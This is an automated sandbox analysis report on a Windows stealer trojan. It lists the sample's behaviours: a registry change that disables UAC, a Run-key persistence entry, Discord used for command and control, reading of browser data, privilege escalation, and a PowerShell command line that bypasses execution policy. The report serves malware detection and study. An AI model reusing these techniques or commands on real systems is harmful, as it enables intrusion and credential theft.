Malware Analysis Report

2025-06-16 06:53

Sample ID 241104-c9yg9s1je1
Target b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe
SHA256 b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2
Tags
discovery evasion execution persistence spyware stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2

Threat Level: Known bad

The file b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe was found to be: Known bad.

Malicious Activity Summary

discovery evasion execution persistence spyware stealer trojan

UAC bypass

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Blocklisted process makes network request

Checks installed software on the system

Adds Run key to start application

An obfuscated cmd.exe command-line is typically used to evade detection.

Drops file in System32 directory

Enumerates processes with tasklist

Drops file in Windows directory

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-04 02:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-04 02:47

Reported

2024-11-04 02:50

Platform

win10v2004-20241007-en

Max time kernel

135s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 = "C:\\ProgramData\\Update.vbs" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} = "\"C:\\Users\\Admin\\AppData\\Local\\Package Cache\\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\\python-3.12.6-amd64.exe\" /burn.runonce" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\NauSjxiGnW.txt C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe N/A
File opened for modification C:\Windows\System32\NauSjxiGnW.txt C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE157.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57de3f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57de3a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{901B913C-FA63-48D2-9842-7D7676739378} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57de3e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57de3f.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{537B2AF5-504B-4303-99CB-FDE56F47AA51} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE466.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57de3a.msi C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\python-installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\Version = "3.12.6150.0" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\ = "{901B913C-FA63-48D2-9842-7D7676739378}" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Version = "3.12.6150.0" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\DisplayName = "Python 3.12.6 Executables (64-bit)" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\ = "{537B2AF5-504B-4303-99CB-FDE56F47AA51}" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Version = "3.12.6150.0" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12 C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\ = "{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\DisplayName = "Python 3.12.6 Core Interpreter (64-bit)" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\DisplayName = "Python 3.12.6 (64-bit)" C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378} C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51} C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1820 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 212 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1684 wrote to memory of 2412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1684 wrote to memory of 2412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2412 wrote to memory of 3940 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2412 wrote to memory of 3940 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1820 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 4536 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4536 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1820 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 2032 wrote to memory of 4240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2032 wrote to memory of 4240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3168 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3168 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 4980 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4980 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1544 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1544 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1820 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 2268 wrote to memory of 3456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2268 wrote to memory of 3456 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4960 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4960 wrote to memory of 2004 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2620 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2620 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1820 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 4956 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 2684 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2684 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1820 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 916 wrote to memory of 1860 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 916 wrote to memory of 1860 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1820 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1684 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1684 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1820 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 4564 wrote to memory of 516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4564 wrote to memory of 516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1820 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe

"C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

